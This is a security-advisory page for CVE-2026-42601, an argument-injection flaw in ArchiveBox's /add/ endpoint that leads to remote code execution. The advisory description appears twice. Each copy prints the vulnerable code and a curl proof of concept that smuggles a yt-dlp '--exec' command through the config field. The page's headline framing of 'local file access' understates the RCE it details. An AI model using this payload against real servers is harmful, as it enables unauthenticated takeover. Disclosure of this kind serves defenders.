Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.3
CVE-2026-42601: ArchiveBox Exposes Local File Access via Unvalidated Config
GHSA-3h23-7824-pj8r
CVE-2026-42601
GHSA-3h23-7824-pj8r
Summary
A security issue in ArchiveBox allows an attacker to execute arbitrary commands on the system, potentially leading to unauthorized access to local files. This issue affects users who have enabled bookmarklet usage, making it exploitable without authentication. To mitigate this, users should review and update their configuration settings, and consider disabling bookmarklet usage if not necessary.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| pip | – | archivebox | <= 0.8.6rc0 |
| – | archivebox | archivebox |
< 0.8.6 0.8.6 cpe:2.3:a:archivebox:archivebox:*:*:*:*:*:*:*:* |
Original title
ArchiveBox Vulnerable to RCE via unvalidated per-crawl config overrides in AddView
Original description
The /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE.
When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.
Affected code:
core/views.py:887 - user config extracted with no validation:
```python
custom_config = form.cleaned_data.get("config") or {}
```
core/views.py:918 - merged into crawl config:
```python
config.update(custom_config)
```
config/configset.py:255-256 - crawl config applied with high priority:
```python
if crawl and hasattr(crawl, "config") and crawl.config:
config.update(crawl.config)
```
hooks.py:398-411 - config exported as env vars:
```python
for key, value in config.items():
if key in SKIP_KEYS: continue
env[key] = str(value)
```
plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:
```python
ytdlp_args_extra = get_env_array("YTDLP_ARGS_EXTRA", [])
cmd.extend(ytdlp_args_extra)
```
PoC (pre-auth when PUBLIC_ADD_VIEW=True):
```bash
curl -X POST http://localhost:8000/add/ \
-d "url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
-d "depth=0" \
-d "config={\"YTDLP_ARGS_EXTRA\": \"[\\\"--exec\\\", \\\"id > /tmp/pwned\\\"]\"}"
```
After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.
Same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.
Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.
When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.
Affected code:
core/views.py:887 - user config extracted with no validation:
```python
custom_config = form.cleaned_data.get("config") or {}
```
core/views.py:918 - merged into crawl config:
```python
config.update(custom_config)
```
config/configset.py:255-256 - crawl config applied with high priority:
```python
if crawl and hasattr(crawl, "config") and crawl.config:
config.update(crawl.config)
```
hooks.py:398-411 - config exported as env vars:
```python
for key, value in config.items():
if key in SKIP_KEYS: continue
env[key] = str(value)
```
plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:
```python
ytdlp_args_extra = get_env_array("YTDLP_ARGS_EXTRA", [])
cmd.extend(ytdlp_args_extra)
```
PoC (pre-auth when PUBLIC_ADD_VIEW=True):
```bash
curl -X POST http://localhost:8000/add/ \
-d "url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
-d "depth=0" \
-d "config={\"YTDLP_ARGS_EXTRA\": \"[\\\"--exec\\\", \\\"id > /tmp/pwned\\\"]\"}"
```
After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.
Same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.
Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.
ghsa CVSS4.0
9.3
Vulnerability type
CWE-88
Published: 4 May 2026 · Updated: 28 May 2026 · First seen: 4 May 2026